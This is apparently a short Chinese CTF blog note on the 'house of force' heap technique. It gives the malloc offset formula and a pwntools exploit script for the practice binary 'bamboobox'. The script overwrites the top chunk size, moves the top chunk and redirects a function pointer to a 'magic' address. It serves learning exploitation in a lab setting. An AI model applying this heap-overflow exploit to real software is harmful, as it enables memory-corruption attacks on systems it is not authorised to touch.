Hexo

house of force

前提：能通过溢出等方式能控制top_chunk的size域，可以自由控制堆分配尺寸的大小

公式为：malloc(size)中的size=new_top_chunk_addr-old_top_chunk_addr-0x1O
·new_top_chunk_addr为要转移top_chunk的目标地址。
·old_top_chunk_addr为已经被篡改的top_chunk.地址。

可以向前控制也可以向后控制

bamboobox

import sys
from pwn import *
import subprocess
import re
import os
# from pwncli import *
# from LibcSearcher import *
# from ctypes import *
context(arch='amd64', os='linux', log_level='debug')
# context(arch='i386' , os='linux', log_level='debug')
binary = './bamboobox'
#libc = 
#r = remote(host, int(port))

r = process(binary)

# r = gdb.debug(binary)
# libc_ = cdll.LoadLibrary(libc)
#libc_ = ELF(libc)
elf_ = ELF(binary)
# srand = libc.srand(libc.time(0)) #设置种子

default = 1
se      = lambda data                     : r.send(data)
sa      = lambda delim, data              : r.sendafter(delim, data)
sl      = lambda data                     : r.sendline(data)
sla     = lambda delim, data              : r.sendlineafter(delim, data)
rc      = lambda numb=4096                : r.recv(numb)
rl      = lambda time=default             : r.recvline(timeout=time)
ru      = lambda delims, time=default     : r.recvuntil(delims,timeout=time)
rpu     = lambda delims, time=default     : r.recvuntil(delims,timeout=time,drop=True)
uu32    = lambda data                     : u32(data.ljust(4, b'\0'))
uu64    = lambda data                     : u64(data.ljust(8, b'\0'))
lic     = lambda data                     : uu64(ru(data)[-6:])
padding = lambda length                   : b'Yhuan' * (length // 5) + b'Y' * (length % 5)
lg      = lambda var_name: log.success(f"\033[95m{var_name} ：\033[91m0x{globals()[var_name]:x}\033[0m")
prl     = lambda var_name                 : print(len(var_name))
debug   = lambda command=''               : gdb.attach(r,command)
it      = lambda                          : r.interactive()

def show():
    sla("Your choice:",str(1))
    sla("")
def add(len,con):
    sla("Your choice:",str(2))
    sla("item name:",str(len))
    sla("name of item:",con)
def edit(idx,len,con):
    sla("Your choice:",str(3))
    sla("index of item:",str(idx))
    sla("item name:",str(len))
    sla("the item:",con)    
def dele(idx):
    sla("Your choice:",str(4))
    sla("index of item:",str(idx)) 
def debug():
    gdb.attach(r)
    pause()
add(0x20,b"aaaa")
add(0x20,b"aaaa")
magic_addr=0x400d49
payload=p64(0)*5+p64(0xffffffffffffffff)
edit(1,0x40,payload)
offect=0x1c2d000-0x1c2d080-0x10
add(offect,p64(magic_addr))
add(0x10,p64(magic_addr)*2)

sla("Your choice:",str(5))
it()